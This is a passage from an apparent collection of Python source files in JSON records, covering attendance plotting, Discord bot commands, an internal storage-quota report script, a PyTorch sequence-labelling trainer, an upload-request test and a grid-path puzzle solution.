+ bars2\nbars = np.add(bars1, bars2)\n \n# The position of the bars on the x-axis\nr = [0,1,2,3,4,5,6]\n \n# Names of group and bar width\nnames = ['Monday','Tuesday','Wednesday','Thursday','Friday', 'Saturday', 'Sunday']\n\nwidth = 14\nheight = 10\nplt.figure(figsize=(width, height))\n\nplt.bar(r, bars1,label=\"Present\")\nplt.bar(r, bars2, bottom=bars1,label=\"Absent\")\nplt.bar(r, bars3, bottom=bars,label=\"Other\")\n\n# Custom X axis\nplt.xticks(r, names, fontweight='bold')\nplt.xlabel(\"Week Day Attendance Status\")\nplt.legend()\n\n# Show graphic\nplt.show()\n\n\ndf.head(5)\n\n\ntest = pd.DataFrame(df['Status'])\ntest2 = pd.DataFrame(df['classDateTime'])\n\n\n\ndf1 = pd.DataFrame(df, columns = ['Status', 'classDateTime'])\ndf1 
= df1.sort_values('classDateTime')\ndf1 = df1.reset_index()\n\n\ndf1\n\n\n\nfor idx, x in enumerate(df1['classDateTime']):\n tempDay = pd.Timestamp(x).day_name()\n tempStatus = df.loc[idx,'Status']\n if(tempStatus in ['P','PDG','PROJ','PRM']): \n present[tempDay] += 1\n elif(tempStatus in ['U','ABS','AA','PWR']): \n absent[tempDay] += 1\n else:\n other[tempDay] += 1\n\n\nfor idx, x in enumerate(df1['classDateTime']):\n# print(x)\n date = datetime.strptime(x[0:8], '%d-%m-%y')\n print(date)\n\n\n\n\n\n\n","sub_path":"DailyAttendanceInsight.py","file_name":"DailyAttendanceInsight.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160411798","text":"import requests\n\n\nasync def run(client, message, args, prefix, db):\n if len(args) < 3:\n raise Exception(\"Bu komut tam olarak 3 argüman alır. Detaylar için !kullanım döviz\")\n\n para = float(args[0])\n orj = args[1].upper()\n dvz = args[2].upper()\n\n res = requests.get(f\"https://api.exchangeratesapi.io/latest?base={orj}\").json()\n\n if \"error\" in res:\n raise Exception(f\"Döviz çevrilirken bir hata oluştu, komut argümanlarını kontrol et. Detaylar için !kullanım döviz\")\n\n if dvz not in res[\"rates\"]:\n raise Exception(f\"İstenilen kur '{dvz}' bulunamadı\")\n\n else:\n await message.channel.send(f\"💸 `{para}` {orj} → `{para*res['rates'][dvz]}` {dvz}\")\n","sub_path":"commands/döviz.py","file_name":"döviz.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"94041066","text":"#!/usr/bin/env python3\n\nimport requests\nimport pandas\nimport stdiomask\n\n\ndef storageinfo():\n global URL\n env = input(\"Please select the env you want to query? 
[QA, Stage, or Prod]: \").upper()\n if env in ['QA', 'STAGE', 'PROD']:\n\n user = input(\"Please enter a \" + f'{env}' + \" username: \")\n password = stdiomask.getpass(prompt=\"Please enter \" + f'{env}' + ' password for user ' + f'{user}: ')\n\n if env == 'PROD':\n site = input('Please enter a site location to query [SJC, RTP-SAT, RTP-DR, GPK, BGL, NTN]: ').lower()\n if site == 'rtp-dr':\n site = 'rtp'\n URL = f'http://{site}-wapl-localhost.com:6090'\n elif site == 'sjc':\n URL = f'http://{site}-wapl-localhost.com:6090'\n elif site == 'rtp-sat':\n site = 'rtp'\n URL = f'http://{site}-wapl-localhosts4.com:6090'\n elif site == 'ntn':\n URL = f'http://{site}-wapl-localhost2.com:6090'\n elif site == 'gpk' or site == 'bgl':\n URL = f'http://{site}-wapl-localhost3.com:6090'\n else:\n print('Please re-run script and select one of the following PROD sites [SJC, RTP-SAT, RTP-DR, GPK, BGL, NTN]')\n\n elif env == 'STAGE':\n site = input('Please enter a site location to query [SJC, RTP-DR, GPK]: ').lower()\n if site == 'rtp-dr':\n site = 'rtp'\n URL = f'http://{site}-stg-localhost1.com:6090'\n elif site == 'sjc' or site == 'gpk':\n URL = f'http://{site}-stg-localhost1.com:6090'\n else:\n print('Please re-run script and select one of the following STAGE sites [SJC, RTP-DR, GPK,]')\n\n elif env == 'QA':\n site = input('Please enter a site location to query [SJC, RTP-DR,GPK]: ').lower()\n if site == 'rtp-dr':\n site = 'rtp'\n URL = f'http://{site}-qa-localhost1.com:6090'\n elif site == 'sjc' or site == 'gpk':\n URL = f'http://{site}-qa-localhost1.com:6090'\n else:\n print('Please re-run script and select one of the following QA sites [SJC, RTP-DR, GPK,]')\n else:\n print('Please re-run script and select one of the following env [QA, Stage, or Prod]')\n try:\n\n print(f'Querying API endpoint, please wait while I fetch the data.........')\n session = requests.Session()\n\n r = session.get(url=f'{URL}/localhost/api/storageinfo', auth=(user, password), timeout=None)\n\n if r.status_code != 200:\n print('Script failed due to the following status code ===>', r.status_code)\n exit(1)\n\n dataJson = r.json()\n data = dataJson['storageSummary']['repositoriesSummaryList']\n df = pandas.DataFrame(data=data)\n\n print(\n 'Done, Saving the file ' + f'localhost_{env}_{site.upper()}_Storage_Quota_report.csv' + ' to current working directory')\n df.to_csv(f'./localhost_{env}_{site.upper()}_Storage_Quota_report.csv', index=False)\n\n # catch all the exceptions\n except requests.exceptions.RequestException as e:\n print('ERROR: Request failed due to the following error =====>', e)\n\n else:\n print('Please only enter, [QA, Stage, or Prod]')\n\n\nstorageinfo()","sub_path":"storage_quota_report.py","file_name":"storage_quota_report.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"584637178","text":"\nimport torch\nimport torch.nn.functional as F\n\nimport time\nimport math\nimport os\nfrom configparser import ConfigParser\nimport tqdm\nimport numpy as np\n\nfrom cnn4ie.dcnn.model import MultiLayerResDYCNN\nfrom dset.get_dataset import build_data_iter\nfrom cnn4ie.util.model_util import init_weights, epoch_time\nfrom cnn4ie.util import define_optimizer\nfrom cnn4ie.util import define_loss\nfrom cnn4ie.util import metrics, crf_util\n\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nclass Train():\n def __init__(self):\n pass\n\n def _define_model(self,\n input_dim,\n output_dim,\n emb_dim,\n 
hid_dim,\n cnn_layers,\n encoder_layers,\n kernel_size,\n dropout,\n PAD_IDX,\n max_length,\n pretrained_embedding_vocab=None,\n init=True,\n use_crf=True):\n '''\n define model\n :param input_dim:\n :param output_dim\n :param emb_dim:\n :param hid_dim:\n :param cnn_layers:\n :param encoder_layers:\n :param kernel_size:\n :param dropout:\n :param use_crf:\n :param PAD_IDX\n :param pretrained_embedding_vocab\n :param init\n :return:\n '''\n model = MultiLayerResDYCNN(input_dim,\n output_dim,\n emb_dim,\n hid_dim,\n cnn_layers,\n encoder_layers,\n kernel_size,\n dropout,\n PAD_IDX,\n max_length,\n use_crf=use_crf)\n\n # init model weights\n if init:\n model.apply(init_weights)\n\n # init model token embedding\n if pretrained_embedding_vocab:\n model.tok_embedding.weight.data.copy_(pretrained_embedding_vocab.vectors)\n UNK_IDX = pretrained_embedding_vocab['']\n # pre-trained weights of the unk and pad word vectors are not trained on our dataset corpus, it is best to set them to zero\n model.tok_embedding.weight.data[UNK_IDX] = torch.zeros(emb_dim)\n model.tok_embedding.weight.data[PAD_IDX] = torch.zeros(emb_dim)\n\n return model.to(DEVICE)\n\n @staticmethod\n def load_model(input_dim,\n output_dim,\n emb_dim,\n hid_dim,\n cnn_layers,\n encoder_layers,\n kernel_size,\n dropout,\n PAD_IDX,\n max_length,\n model_path,\n use_crf=True):\n '''\n load model\n :param input_dim:\n :param output_dim\n :param emb_dim:\n :param hid_dim:\n :param cnn_layers:\n :param encoder_layers:\n :param kernel_size:\n :param dropout:\n :param PAD_IDX\n :param model_path\n :param use_crf\n :return:\n '''\n model = MultiLayerResDYCNN(input_dim,\n output_dim,\n emb_dim,\n hid_dim,\n cnn_layers,\n encoder_layers,\n kernel_size,\n dropout,\n PAD_IDX,\n max_length,\n use_crf=use_crf)\n # load model\n if os.path.exists(model_path):\n model.load_state_dict(torch.load(model_path, map_location=DEVICE))\n else:\n raise FileNotFoundError('Not found model file!')\n\n return model.to(DEVICE)\n\n def _train(self, model, train_iter, optimizer, criterion, clip):\n '''\n trainning module\n :param model:\n :param iterator:\n :param optimizer:\n :param criterion:\n :param clip:\n :return:\n '''\n model.train()\n epoch_loss = 0\n if model.use_crf:\n for batch in train_iter:\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n optimizer.zero_grad()\n\n loss = model.log_likelihood(source, target)\n\n loss.backward()\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n\n optimizer.step()\n\n epoch_loss += loss.item()\n\n return epoch_loss / len(train_iter)\n\n else:\n for i, batch in enumerate(train_iter):\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n optimizer.zero_grad()\n\n out = model(source) # [batch_size, src_len, output_dim]\n out = out.view(-1, out.shape[-1]) # [batch_size * src_len, output_dim]\n\n out = out.contiguous().view(-1, out.shape[-1]) # [batch_size * src_len, output_dim]\n target = target.contiguous().view(-1) # [batch_size * src_len]\n\n # loss\n loss = criterion(out, target)\n\n loss.backward()\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n\n optimizer.step()\n\n epoch_loss += loss.item()\n\n return epoch_loss / len(train_iter)\n\n def _validate(self, model, val_iter, criterion):\n '''\n validation module\n :param model:\n :param iterator:\n :param criterion:\n :return:\n '''\n model.eval()\n\n epoch_loss = 0\n if model.use_crf:\n with torch.no_grad():\n 
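# evaluation pass: autograd is disabled here, which saves memory and compute\n                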
preds, labels = [], []\n for batch in val_iter:\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n out = model(source) # [batch_size, src_len, output_dim]\n\n # the length of non-zero true labels\n non_zero = []\n for i in target.cpu():\n tmp = []\n for j in i:\n if j.item() > 0:\n tmp.append(j.item())\n non_zero.append(tmp)\n\n for index, i in enumerate(out):\n preds += i[:len(non_zero[index])]\n\n for index, i in enumerate(target.tolist()):\n labels += i[:len(non_zero[index])]\n\n \n\n # loss\n loss = model.log_likelihood(source, target)\n\n epoch_loss += loss.item()\n # p,r,f1 metrics\n report = metrics.classification_report_f_r_f1(labels, preds)\n return epoch_loss / len(val_iter), report\n\n else:\n with torch.no_grad():\n labels = np.array([])\n predicts = np.array([])\n for batch in tqdm.tqdm(val_iter):\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n out = model(source) # [batch_size, src_len, output_dim]\n out = out.view(-1, out.shape[-1]) # [batch_size * src_len, output_dim]\n\n out = out.contiguous().view(-1, out.shape[-1]) # [batch_size * src_len, output_dim]\n target = target.contiguous().view(-1) # [batch_size * src_len]\n\n # p,r,f1 metrics\n prediction = torch.max(F.softmax(out, dim=1), dim=1)[1]\n pred_y = prediction.cpu().data.numpy().squeeze()\n target_y = target.cpu().data.numpy()\n labels = np.append(labels, target_y)\n predicts = np.append(predicts, pred_y)\n\n # loss\n loss = criterion(out, target)\n\n epoch_loss += loss.item()\n report = metrics.classification_report_f_r_f1(labels, predicts)\n return epoch_loss / len(val_iter), report\n\n def _validate_2(self, model, val_iter, criterion, tags, tags_map):\n '''\n validation PER,ORG,LOC,T\n :param model:\n :param val_iter:\n :param criterion:\n :param tags\n :param tags_map\n :return:\n '''\n\n model.eval()\n\n epoch_loss = 0\n if model.use_crf:\n with torch.no_grad():\n for batch in val_iter:\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n out = model(source) # [batch_size, src_len, output_dim]\n print('\\treport:')\n for tag in tags:\n crf_util.f1_score(target, out, tag, tags_map)\n # loss\n loss = model.log_likelihood(source, target)\n epoch_loss += loss.item()\n return epoch_loss / len(val_iter)\n\n else:\n with torch.no_grad():\n for batch in tqdm.tqdm(val_iter):\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n out = model(source) # [batch_size, src_len, output_dim]\n print('\\treport')\n for tag in tags:\n crf_util.f1_score(target, out, tag, tags_map)\n # loss\n loss = criterion(out, target)\n epoch_loss += loss.item()\n return epoch_loss / len(val_iter)\n\n def _train_val_main(self, model, optimizer, criterion, clip, n_epochs, train_iter, val_iter, model_path):\n '''\n trainning and validation\n :param model:\n :param optimizer:\n :param criterion:\n :param clip:\n :param n_epochs:\n :param train_iter:\n :param val_iter:\n :param model_path:\n :return:\n '''\n\n best_valid_loss = float('inf')\n # use crf\n if model.use_crf:\n for epoch in range(n_epochs):\n start_time = time.time()\n\n train_loss = self._train(model, train_iter, optimizer, criterion, clip)\n valid_loss, report = self._validate(model, val_iter, criterion)\n\n end_time = time.time()\n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n\n if valid_loss < 
best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(model.state_dict(), model_path)\n\n try:\n train_ppl = math.exp(train_loss)\n except OverflowError:\n train_ppl = float('inf')\n\n try:\n val_ppl = math.exp(valid_loss)\n except OverflowError:\n val_ppl = float('inf')\n\n print(f'Epoch: {epoch + 1:02} | Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train PPL: {train_ppl}')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. PPL: {val_ppl}')\n print(f'\\t Val. report: {report}')\n\n else:\n for epoch in range(n_epochs):\n start_time = time.time()\n\n train_loss = self._train(model, train_iter, optimizer, criterion, clip)\n valid_loss, report = self._validate(model, val_iter, criterion)\n\n end_time = time.time()\n\n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n\n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(model.state_dict(), model_path)\n\n try:\n train_ppl = math.exp(train_loss)\n except OverflowError:\n train_ppl = float('inf')\n\n try:\n val_ppl = math.exp(valid_loss)\n except OverflowError:\n val_ppl = float('inf')\n\n print(f'Epoch: {epoch + 1:02} | Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train PPL: {train_ppl}')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. PPL: {val_ppl}')\n print(f'\\t Val. report: {report}')\n\n def train_model(self, config_path):\n if os.path.exists(config_path) and (os.path.split(config_path)[1].split('.')[0] == 'config') and (\n os.path.splitext(config_path)[1].split('.')[1] == 'cfg'):\n # load config file\n config = ConfigParser()\n config.read(config_path)\n section = config.sections()[0]\n\n # train and val file\n data_catalog = config.get(section, \"data_catalog\")\n # data_catalog = os.path.join(os.path.dirname(os.path.abspath('..')), data_catalog)\n train_file_name = config.get(section, \"train_file_name\")\n validation_file_name = config.get(section, \"validation_file_name\")\n\n # save vocabs of source, target, label\n source_vocab_path = config.get(section, \"source_vocab_path\")\n # source_vocab_path = os.path.join(os.path.dirname(os.path.abspath('..')), 'data', source_vocab_path)\n\n target_vocab_path = config.get(section, \"target_vocab_path\")\n # target_vocab_path = os.path.join(os.path.dirname(os.path.abspath('..')), 'data', target_vocab_path)\n\n label_vocab_path = config.get(section, \"label_vocab_path\")\n # label_vocab_path = os.path.join(os.path.dirname(os.path.abspath('..')), 'data', label_vocab_path)\n\n pretrained_embedding_path = config.get(section, \"pretrained_embedding_path\")\n # pretrained_embedding_path = os.path.join(os.path.dirname(os.path.abspath('..')), 'data', pretrained_embedding_path)\n\n # model save/load path\n model_path = config.get(section, \"model_path\")\n # model_path = os.path.join(os.path.dirname(os.path.abspath('..')), \"model\", model_path)\n\n # model param config\n input_dim = config.getint(section, \"input_dim\")\n output_dim = config.getint(section, \"output_dim\")\n emb_dim = config.getint(section, \"emb_dim\")\n hid_dim = config.getint(section, \"hid_dim\")\n cnn_layers = config.getint(section, \"cnn_layers\")\n encoder_layers = config.getint(section, \"encoder_layers\")\n kernel_size = config.getint(section, \"kernel_size\")\n dropout = config.getfloat(section, \"dropout\")\n max_length = config.getint(section, \"max_length\")\n\n lr = config.getfloat(section, \"lr\")\n lr_decay = config.getfloat(section, 'lr_decay')\n weight_decay = config.getfloat(section, \"weight_decay\")\n 
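# optimizer hyperparameters are all read up front; only the ones a given optimizer accepts are passed along below\n            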
gamma = config.getfloat(section, \"gamma\")\n momentum = config.getfloat(section, \"momentum\")\n eps = config.getfloat(section, \"eps\")\n batch_size = config.getint(section, \"batch_size\")\n clip = config.getfloat(section, \"clip\")\n n_epochs = config.getint(section, \"n_epochs\")\n\n optimizer_name = config.get(section, \"optimizer\")\n loss_name = config.get(section, \"loss\")\n\n pretrained_embedding_vocab = None\n # load pretrained embedding from file\n if os.path.exists(pretrained_embedding_path):\n # get train and val data, source_dict_size_embedding, target dict size, padding_idx\n train_iter, val_iter, pretrained_embedding_vocab, output_dim, PAD_IDX = build_data_iter(data_catalog,\n train_file_name,\n validation_file_name,\n source_vocab_path,\n target_vocab_path,\n label_vocab_path,\n batch_size,\n max_length,\n pretrained_embedding_path)\n input_dim = pretrained_embedding_vocab.vectors.shape[0]\n emb_dim = pretrained_embedding_vocab.vectors.shape[1]\n\n else:\n # get train and val data, source dict size, target dict size size, padding_idx\n train_iter, val_iter, input_dim, output_dim, PAD_IDX = build_data_iter(data_catalog,\n train_file_name,\n validation_file_name,\n source_vocab_path,\n target_vocab_path,\n label_vocab_path,\n batch_size,\n max_length)\n\n # define loss\n if loss_name == 'crf':\n criterion = None\n use_crf = True\n\n elif loss_name == 'ce':\n criterion = define_loss.define_loss_ce(PAD_IDX)\n use_crf = False\n\n elif loss_name == 'bce':\n criterion = define_loss.define_loss_bce()\n use_crf = False\n\n elif loss_name == 'bcelogits':\n criterion = define_loss.define_loss_bcelogits()\n use_crf = False\n\n else:\n raise NameError('No define loss function name!')\n\n print('input_dim:{}'.format(input_dim))\n print('emb_dim:{}'.format(emb_dim))\n\n # define model\n model = self._define_model(input_dim,\n output_dim,\n emb_dim,\n hid_dim,\n cnn_layers,\n encoder_layers,\n kernel_size,\n dropout,\n PAD_IDX,\n max_length,\n pretrained_embedding_vocab,\n True,\n use_crf)\n\n # define optimizer\n if optimizer_name == 'adam':\n optimizer = define_optimizer.define_optimizer_adam(model, lr=lr, weight_decay=weight_decay)\n\n elif optimizer_name == 'adamw':\n optimizer = define_optimizer.define_optimizer_adamw(model, lr=lr, weight_decay=weight_decay)\n\n elif optimizer_name == 'sgd':\n optimizer = define_optimizer.define_optimizer_sgd(model, lr=lr, momentum=momentum, weight_decay=weight_decay)\n\n elif optimizer_name == 'adagrad':\n optimizer = define_optimizer.define_optimizer_adagrad(model, lr=lr, lr_decay=lr_decay,\n weight_decay=weight_decay)\n\n elif optimizer_name == 'rmsprop':\n optimizer = define_optimizer.define_optimizer_rmsprop(model, lr=lr, weight_decay=weight_decay,\n momentum=momentum)\n\n elif optimizer_name == 'adadelta':\n optimizer = define_optimizer.define_optimizer_adadelta(model, lr=lr, weight_decay=weight_decay)\n\n else:\n raise NameError('No define optimization function name!')\n\n # train and validate\n self._train_val_main(model, optimizer, criterion, clip, n_epochs, train_iter, val_iter, model_path)\n\n else:\n raise FileNotFoundError('File config.cfg not found : ' + config_path)\n\nif __name__ == '__main__':\n config_path = os.path.join(os.getcwd(), 'config.cfg')\n train = Train()\n train.train_model(config_path)\n\n","sub_path":"cnn4ie/dcnn/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":21449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"329407860","text":"#!/user/bin/env python\n#coding:utf-8\n#Author:shenqiang\nimport requests\n\nclass filesHeader(object):\n '''文件传输头'''\n def fileHeader(self):\n sessionId = requests.Session\n headers = {'Accept':'application/json',\n 'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryNicLzxIDDIWaxMKM',\n 'Referer':'http://lyfadmin.edu.laiyifen.com/cms/h5-editor.html?platForm=2&pageId=1007099501000011&themeId=1&pageType=16&mode=1',\n 'Cookie':'ut=40279d073a3144ca84bef53a82c95cbb'\n }\n return sessionId,headers\n\n '''data数据'''\n def datas(self):\n data = {}\n return data\n\n '''file数据'''\n def files(self):\n file = {'Filedata':\n ('全渠道效果图.png',open('/Users/apple/Documents/罗马项目/营销域-主测试/全渠道效果图.png','rb'),'image/png',{})}\n return file\n\n\nclass upLoadFiles(filesHeader):\n\n def upLoadFilesPost(self):\n r = requests.post(url='http://lyfadmin.edu.laiyifen.com/cms/file/uploadFile.do', data=filesHeader.datas(),headers=filesHeader.fileHeader())\n # print(r)\n\n# if __name__ == '__main__':\n# upLoadFiles = upLoadFiles()\n# upLoadFiles.upLoadFilesPost()\n\n\n\n\n\n\n","sub_path":"tryApiTest/apiRequestTests/apiTests/execlFiles/TryUpLoadFile.py","file_name":"TryUpLoadFile.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"151871937","text":"class Solution:\n def uniquePathsWithObstacles(self, obstacleGrid):\n \"\"\"\n :type obstacleGrid: List[List[int]]\n :rtype: int\n \"\"\"\n row = len(obstacleGrid)\n if row == 0 or obstacleGrid[0][0] == 1 or (row != 0 and len(obstacleGrid[0]) == 0):\n return 0\n column = len(obstacleGrid[0])\n dp = [[0 for _ in range(column)] for _ in range(row)]\n for i in range(row):\n for j in range(column):\n if obstacleGrid[i][j] == 1:\n dp[i][j] = 0\n elif i == 0 and j == 0:\n dp[i][j] = 1\n elif i == 0 and j > 0:\n dp[i][j] = dp[i][j-1]\n elif i > 0 and j == 0:\n dp[i][j] = dp[i-1][j]\n else:\n dp[i][j] = dp[i][j-1] + dp[i-1][j]\n return dp[-1][-1]\n#2018.11.22\n#------------------main function-----------------\nif __name__ == '__main__':\n ls = [[0,0,0],[0,1,0],[0,0,0]]\n # ls = [[0,0],[1,1],[0,0]]\n # ls = [[0,0],[1,0]]\n # ls = [[0,0],[0,1]]\n # ls = [[0,1,0,0,0],[1,0,0,0,0],[0,0,0,0,0],[0,0,0,0,0]]\n s = Solution()\n nums = s.uniquePathsWithObstacles(ls)\n print(nums)","sub_path":"python_yxs/63.UniquePaths2.py","file_name":"63.UniquePaths2.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"167211323","text":"import io\nimport re\nimport textwrap\nfrom math import floor\n\nimport aiohttp\nimport discord\nfrom PIL import Image, ImageFont, ImageDraw\nfrom discord.ext import commands\n\nfrom cogs.utils.paginator import Pages\n\n\nasync def download(url):\n async with aiohttp.ClientSession() as sess:\n async with sess.get(url) as r:\n return io.BytesIO(await r.read())\n\n\nclass AvatarOrOnlineImage(commands.Converter):\n async def convert(self, ctx, argument):\n try:\n possible_member = await commands.MemberConverter() \\\n .convert(ctx, argument)\n url = possible_member.avatar_url_as(format='png')\n url = url.replace('gif', 'png').strip('<>')\n\n img = await download(url)\n\n img = Image.open(img)\n\n return img.convert('RGBA')\n except commands.BadArgument:\n pass\n\n # from https://stackoverflow.com/questions/169625/\n # regex-to-check-if-valid-url-that-ends-in-jpg-png-or-gif\n # (Sorry about breaking the URL)\n\n # will add more image formats as 
time goes on\n        regex = r'https?://\\S+\\.(?:png|jpe?g)'\n\n        regex = re.compile(regex, re.IGNORECASE)\n\n        if re.fullmatch(regex, argument):\n            img = await download(argument.strip('<>'))\n\n            img = Image.open(img)\n\n            return img.convert('RGBA')\n        else:\n            # must be text\n            return argument\n\n\n# The floor is good naming\nclass AvatarOrOnlineImageOrText(commands.Converter):\n    async def convert(self, ctx, argument):\n        try:\n            possible_member = await commands.MemberConverter() \\\n                .convert(ctx, argument)\n            url = possible_member.avatar_url_as(format='png')\n            url = url.replace('gif', 'png').strip('<>')\n\n            img = await download(url)\n\n            img = Image.open(img)\n\n            return img.convert('RGBA'), possible_member.name\n        except commands.BadArgument:\n            pass\n\n        # from https://stackoverflow.com/questions/169625/\n        # regex-to-check-if-valid-url-that-ends-in-jpg-png-or-gif\n        # (Sorry about breaking the URL)\n\n        # will add more image formats as time goes on\n        regex = r'https?://\\S+\\.(?:png|jpe?g)'\n\n        regex = re.compile(regex, re.IGNORECASE)\n\n        if re.fullmatch(regex, argument.split(' ')[0]):\n            img = await download(argument.split(' ')[0].strip('<>'))\n\n            img = Image.open(img)\n\n            text = ' '.join(argument.split(' ')[1:])\n            if not text:\n                raise commands.BadArgument('No text supplied for image')\n            return img.convert('RGBA'), text\n        else:\n            raise commands.BadArgument(\n                \"That URL doesn't seem to lead to a valid image\"\n            )\n\n\nclass LinkOrAvatar(commands.Converter):\n    special_cases = {\n        'itsthejoker': 'https://avatars0.githubusercontent.com/u/5179553'\n    }\n\n    async def convert(self, ctx, argument):\n        try:\n            possible_member = await commands.MemberConverter() \\\n                .convert(ctx, argument)\n            if possible_member.name not in self.special_cases:\n                url = possible_member.avatar_url_as(format='png')\n                url = url.replace('gif', 'png').strip('<>')\n            else:\n                url = self.special_cases[possible_member.name]\n\n            img = await download(url)\n\n            img = Image.open(img)\n\n            return img.convert('RGBA'), possible_member.name\n        except commands.BadArgument:\n            pass\n\n        # from https://stackoverflow.com/questions/169625/\n        # regex-to-check-if-valid-url-that-ends-in-jpg-png-or-gif\n        # (Sorry about breaking the URL)\n\n        # will add more image formats as time goes on\n        regex = r'https?://\\S+\\.(?:png|jpe?g)'\n\n        regex = re.compile(regex, re.IGNORECASE)\n\n        if re.fullmatch(regex, argument.split(' ')[0]):\n            img = await download(argument.split(' ')[0].strip('<>'))\n\n            img = Image.open(img)\n\n            text = ' '.join(argument.split(' ')[1:])\n            if not text:\n                raise commands.BadArgument('No text supplied for image')\n            return img.convert('RGBA'), text\n        else:\n            raise commands.BadArgument(\n                \"That URL doesn't seem to lead to a valid image\"\n                # if possible_member else \"I couldn't find that user\"\n            )\n\n\nclass Other:\n    def __init__(self, bot):\n        self.bot = bot\n\n    @staticmethod\n    async def __error(ctx, err):\n        if isinstance(err, commands.BadArgument):\n            await ctx.send(err)\n\n    @commands.command()\n    async def forum(self, ctx, *, search):\n        \"\"\"Search the Swift Discourse Forum for anything.\"\"\"\n        async with aiohttp.ClientSession() as s:\n            async with s.get(\n                'https://forums.swift.org/search/query.json',\n                params={'term': search}\n            ) as r:\n                r = await r.json()\n\n        if r['grouped_search_result'] is None:\n            return await ctx.send('No results found.')\n\n        data = []\n\n        # I'm sorry. 
(Ok not as bad now)\n\n        # idk why, but topics seem to disappear sometimes\n        data.extend([(f't/{t[\"id\"]}', t['title'])\n                     for t in r.get('topics', [])])\n\n        data.extend([(f'u/{u[\"username\"]}',\n                      f'{u[\"username\"]} ({u[\"name\"]})')\n                     for u in r['users']])\n\n        data.extend([(f'c/{c[\"id\"]}', c['name'])\n                     for c in r['categories']])\n\n        data.extend([(f'tags/{t[\"name\"]}', t['name'])\n                     for t in r['tags']])\n\n        data.extend([(f'p/{p[\"id\"]}', p['blurb'])\n                     for p in r['posts']])\n\n        if not data:\n            return await ctx.send('No results found.')\n\n        p = Pages(\n            ctx,\n            entries=[f'[{d[1]}](https://forums.swift.org/{d[0]})'\n                     for d in data]\n        )\n\n        await p.paginate()\n\n    # noinspection PyUnresolvedReferences,PyPep8Naming\n    @commands.command()\n    async def blame(self, ctx, *, img: AvatarOrOnlineImageOrText = None):\n        \"\"\"Blame everyone! Defaults to perryprog.\n\n        Will also accept image urls ending in jpg, png, and jpeg.\"\"\"\n        # hardcoded because I want to be blamed even in forks ;)\n        img, name = img or await LinkOrAvatar() \\\n            .convert(ctx, '280001404020588544')\n        # special cases for usernames\n        special_cases = {\n            'perryprog': 'perry',\n            'itsthejoker': 'joker'\n        }\n\n        # :no_entry: emoji\n        emoji = 'https://emojipedia-us.s3.amazonaws.com/thumbs/240/twitter/' \\\n                '120/no-entry-sign_1f6ab.png'\n        emoji = await download(emoji)\n        emoji = Image.open(emoji)\n        emoji = emoji.convert('RGBA')\n\n        # make the image 3 times larger than the avatar\n        large_image = Image.new('RGBA', [3 * x for x in img.size], (0,) * 4)\n        lW, lH = large_image.size\n        W, H = img.size\n        # the center box for the avatar\n        box = (W, H, W * 2, H * 2)\n\n        # make the emoji 20% bigger than the avatar\n        emoji = emoji.resize([floor(x * 1.2) for x in img.size])\n        eW, eH = emoji.size\n\n        large_image.paste(img.copy(), box)\n        large_image.paste(\n            emoji,\n\n            ( # center the emoji\n                floor((lW - eW) / 2),\n\n                floor((lH - eH) / 2)\n            ),\n\n            emoji\n        )\n\n        # make the font size relative to the avatar size\n        fnt = ImageFont.truetype('Arial.ttf', floor(img.size[0] / 4))\n        d = ImageDraw.Draw(large_image)\n\n        name = special_cases.get(\n            name,\n            re.sub(r'\\W', '', name).lower()\n        )\n\n        message = f'#blame{name}'\n        tW, tH = d.textsize(message, fnt)\n\n        d.text(\n            ( # center the text\n                floor((lW - tW) / 2),\n                # make the text somewhat centered (a bit offset so it\n                # looks good) in the first \"row\"\n                floor(H / 2) - floor(W / 4)\n            ),\n            message,\n            font=fnt,\n            fill=(255,) * 4\n        )\n\n        bio = io.BytesIO()\n        large_image.save(bio, 'PNG')\n        bio.seek(0)\n        await ctx.send(file=discord.File(bio, filename='blame.png'))\n\n    # noinspection PyPep8Naming,PyUnresolvedReferences\n    @commands.command(aliases=['floor'])\n    async def the_floor(self, ctx, img: AvatarOrOnlineImageOrText, *, what):\n        \"\"\"Generate a \"the floor is lava\" meme.\"\"\"\n\n        img, _ = img\n\n        if len(what) > 179:\n            return await ctx.send(\"The floor isn't that long. 
